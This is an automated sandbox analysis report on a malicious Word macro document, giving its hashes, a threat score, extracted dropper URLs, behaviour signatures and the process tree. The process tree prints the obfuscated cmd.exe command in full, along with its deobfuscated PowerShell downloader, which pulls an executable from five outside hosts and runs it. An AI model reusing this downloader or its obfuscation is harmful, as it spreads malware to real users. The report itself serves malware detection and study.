Analysis

  • max time kernel
    130s
  • max time network
    129s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-05-2024 11:56

General

  • Target

    24bb76ad6a9367820337836451600353_JaffaCakes118.doc

  • Size

    222KB

  • MD5

    24bb76ad6a9367820337836451600353

  • SHA1

    a70c576c9f1360a7f90fb1ba34f9793803952601

  • SHA256

    1f8b157a1ffc5053b9aff97ef49879b777f81f0a5ace7c481eefe9bdceb3cd18

  • SHA512

    827da66c5b3789c0a9365bcb1748483352a86b0cd9f8ddce4ab75091c957f59b0244fdf84f6436f946bd37d5a44a0c06d1f3cd28aa4b0c06b623c871fe0fd295

  • SSDEEP

    3072:ZtUxagq58ghpPyjL/xSu90OoiLuDKZXfwKeljR1C:ZtUxagqOgvPAxUOmD+XfwLu

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://mail.saglikpersoneli.net/sohft/PTYGsf41Witt_k

exe.dropper

http://www.vario-reducer.com/wp-content/bGkoUUavZySGn

exe.dropper

http://kadinveyasam.org/wp-content/languages/EZ22B35GBTu9z_N

exe.dropper

http://mingroups.vn/NYV82LSYWEs_s1

exe.dropper

http://www.ontamada.ru/RDUstD0DxgOP

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\24bb76ad6a9367820337836451600353_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3540
    • C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set 7uKh=;'jwjzmmf'=sqtkjfj$}}{hctac}};kaerb;'clpozi'=zvcsjjd$;tcksr$ metI-ekovnI{ )00004 eg- htgnel.)tcksr$ metI-teG(( fI;'wazpp'=bapziuv$;)tcksr$ ,ddzqnoc$(eliFdaolnwoD.hljvjdk${yrt{)fflkm$ ni ddzqnoc$(hcaerof;'exe.'+liudzw$+'\'+pmet:vne$=tcksr$;'pjzljtj'=clvstjq$;'07' = liudzw$;'imvll'=trowz$;)'@'(tilpS.'POgxD0DtsUDR/ur.adamatno.www//:ptth@1s_sEWYSL28VYN/nv.spuorgnim//:ptth@N_z9uTBG53B22ZE/segaugnal/tnetnoc-pw/gro.masayevnidak//:ptth@nGSyZvaUUokGb/tnetnoc-pw/moc.recuder-oirav.www//:ptth@k_ttiW14fsGYTP/tfhos/ten.ilenosrepkilgas.liam//:ptth'=fflkm$;tneilCbeW.teN tcejbo-wen=hljvjdk$;'lzquq'=ikkbrdw$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop&&for /L %h in (648,-1,0)do set 3ue=!3ue!!7uKh:~%h,1!&&if %h==0 echo !3ue:~-649!| %TMP:~-8,-7%%CommonProgramFiles:~19,1%%LOCALAPPDATA:~-10,-9% "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1884
      • C:\Windows\system32\cmd.exe
        CmD /V:ON/C"set 7uKh=;'jwjzmmf'=sqtkjfj$}}{hctac}};kaerb;'clpozi'=zvcsjjd$;tcksr$ metI-ekovnI{ )00004 eg- htgnel.)tcksr$ metI-teG(( fI;'wazpp'=bapziuv$;)tcksr$ ,ddzqnoc$(eliFdaolnwoD.hljvjdk${yrt{)fflkm$ ni ddzqnoc$(hcaerof;'exe.'+liudzw$+'\'+pmet:vne$=tcksr$;'pjzljtj'=clvstjq$;'07' = liudzw$;'imvll'=trowz$;)'@'(tilpS.'POgxD0DtsUDR/ur.adamatno.www//:ptth@1s_sEWYSL28VYN/nv.spuorgnim//:ptth@N_z9uTBG53B22ZE/segaugnal/tnetnoc-pw/gro.masayevnidak//:ptth@nGSyZvaUUokGb/tnetnoc-pw/moc.recuder-oirav.www//:ptth@k_ttiW14fsGYTP/tfhos/ten.ilenosrepkilgas.liam//:ptth'=fflkm$;tneilCbeW.teN tcejbo-wen=hljvjdk$;'lzquq'=ikkbrdw$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop&&for /L %h in (648,-1,0)do set 3ue=!3ue!!7uKh:~%h,1!&&if %h==0 echo !3ue:~-649!| cmD "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4560
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $wdrbkki='quqzl';$kdjvjlh=new-object Net.WebClient;$mklff='http://mail.saglikpersoneli.net/sohft/PTYGsf41Witt_k@http://www.vario-reducer.com/wp-content/bGkoUUavZySGn@http://kadinveyasam.org/wp-content/languages/EZ22B35GBTu9z_N@http://mingroups.vn/NYV82LSYWEs_s1@http://www.ontamada.ru/RDUstD0DxgOP'.Split('@');$zwort='llvmi';$wzduil = '70';$qjtsvlc='jtjlzjp';$rskct=$env:temp+'\'+$wzduil+'.exe';foreach($conqzdd in $mklff){try{$kdjvjlh.DownloadFile($conqzdd, $rskct);$vuizpab='ppzaw';If ((Get-Item $rskct).length -ge 40000) {Invoke-Item $rskct;$djjscvz='izoplc';break;}}catch{}}$jfjktqs='fmmzjwj';"
          4⤵
            PID:1864
          • C:\Windows\system32\cmd.exe
            cmD
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3476
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell $wdrbkki='quqzl';$kdjvjlh=new-object Net.WebClient;$mklff='http://mail.saglikpersoneli.net/sohft/PTYGsf41Witt_k@http://www.vario-reducer.com/wp-content/bGkoUUavZySGn@http://kadinveyasam.org/wp-content/languages/EZ22B35GBTu9z_N@http://mingroups.vn/NYV82LSYWEs_s1@http://www.ontamada.ru/RDUstD0DxgOP'.Split('@');$zwort='llvmi';$wzduil = '70';$qjtsvlc='jtjlzjp';$rskct=$env:temp+'\'+$wzduil+'.exe';foreach($conqzdd in $mklff){try{$kdjvjlh.DownloadFile($conqzdd, $rskct);$vuizpab='ppzaw';If ((Get-Item $rskct).length -ge 40000) {Invoke-Item $rskct;$djjscvz='izoplc';break;}}catch{}}$jfjktqs='fmmzjwj';
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1732

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\TCD840D.tmp\gb.xsl

      Filesize

      262KB

      MD5

      51d32ee5bc7ab811041f799652d26e04

      SHA1

      412193006aa3ef19e0a57e16acf86b830993024a

      SHA256

      6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

      SHA512

      5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n5qn4hbv.zik.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1732-45-0x0000014B1F460000-0x0000014B1F482000-memory.dmp

      Filesize

      136KB

    • memory/3540-29-0x00007FF906C70000-0x00007FF906E65000-memory.dmp

      Filesize

      2.0MB

    • memory/3540-8-0x00007FF906C70000-0x00007FF906E65000-memory.dmp

      Filesize

      2.0MB

    • memory/3540-30-0x00007FF906C70000-0x00007FF906E65000-memory.dmp

      Filesize

      2.0MB

    • memory/3540-9-0x00007FF906C70000-0x00007FF906E65000-memory.dmp

      Filesize

      2.0MB

    • memory/3540-38-0x00007FF906C70000-0x00007FF906E65000-memory.dmp

      Filesize

      2.0MB

    • memory/3540-7-0x00007FF906C70000-0x00007FF906E65000-memory.dmp

      Filesize

      2.0MB

    • memory/3540-6-0x00007FF906C70000-0x00007FF906E65000-memory.dmp

      Filesize

      2.0MB

    • memory/3540-11-0x00007FF906C70000-0x00007FF906E65000-memory.dmp

      Filesize

      2.0MB

    • memory/3540-13-0x00007FF906C70000-0x00007FF906E65000-memory.dmp

      Filesize

      2.0MB

    • memory/3540-12-0x00007FF906C70000-0x00007FF906E65000-memory.dmp

      Filesize

      2.0MB

    • memory/3540-10-0x00007FF906C70000-0x00007FF906E65000-memory.dmp

      Filesize

      2.0MB

    • memory/3540-39-0x00007FF906C70000-0x00007FF906E65000-memory.dmp

      Filesize

      2.0MB

    • memory/3540-15-0x00007FF8C4C40000-0x00007FF8C4C50000-memory.dmp

      Filesize

      64KB

    • memory/3540-0-0x00007FF8C6CF0000-0x00007FF8C6D00000-memory.dmp

      Filesize

      64KB

    • memory/3540-5-0x00007FF906D0D000-0x00007FF906D0E000-memory.dmp

      Filesize

      4KB

    • memory/3540-4-0x00007FF8C6CF0000-0x00007FF8C6D00000-memory.dmp

      Filesize

      64KB

    • memory/3540-14-0x00007FF8C4C40000-0x00007FF8C4C50000-memory.dmp

      Filesize

      64KB

    • memory/3540-1-0x00007FF8C6CF0000-0x00007FF8C6D00000-memory.dmp

      Filesize

      64KB

    • memory/3540-3-0x00007FF8C6CF0000-0x00007FF8C6D00000-memory.dmp

      Filesize

      64KB

    • memory/3540-57-0x00007FF906C70000-0x00007FF906E65000-memory.dmp

      Filesize

      2.0MB

    • memory/3540-2-0x00007FF8C6CF0000-0x00007FF8C6D00000-memory.dmp

      Filesize

      64KB

    • memory/3540-517-0x00007FF906C70000-0x00007FF906E65000-memory.dmp

      Filesize

      2.0MB

    • memory/3540-536-0x00007FF906C70000-0x00007FF906E65000-memory.dmp

      Filesize

      2.0MB

    • memory/3540-537-0x00007FF906C70000-0x00007FF906E65000-memory.dmp

      Filesize

      2.0MB

    • memory/3540-561-0x00007FF8C6CF0000-0x00007FF8C6D00000-memory.dmp

      Filesize

      64KB

    • memory/3540-562-0x00007FF8C6CF0000-0x00007FF8C6D00000-memory.dmp

      Filesize

      64KB

    • memory/3540-560-0x00007FF8C6CF0000-0x00007FF8C6D00000-memory.dmp

      Filesize

      64KB

    • memory/3540-563-0x00007FF8C6CF0000-0x00007FF8C6D00000-memory.dmp

      Filesize

      64KB

    • memory/3540-564-0x00007FF906C70000-0x00007FF906E65000-memory.dmp

      Filesize

      2.0MB